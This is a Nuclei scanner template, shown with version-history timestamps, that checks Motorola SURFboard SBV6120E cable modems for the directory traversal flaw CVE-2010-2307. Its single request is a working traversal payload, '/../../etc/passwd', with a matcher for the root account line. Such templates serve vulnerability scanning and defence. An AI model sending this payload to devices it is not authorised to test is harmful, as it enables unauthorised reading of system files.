nuclei-templates/cves/2010/CVE-2010-2307.yaml

27 lines
873 B
YAML
Raw Normal View History

2021-07-16 17:38:35 +00:00
id: CVE-2010-2307
2021-07-16 17:32:16 +00:00
info:
2021-07-16 17:38:35 +00:00
name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal
2021-07-16 17:32:16 +00:00
author: daffainfo
severity: high
2021-07-20 14:24:23 +00:00
description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
reference: |
- https://www.securityfocus.com/bid/40550/info
- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
2021-07-16 17:32:16 +00:00
tags: cve,cve2010,iot,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200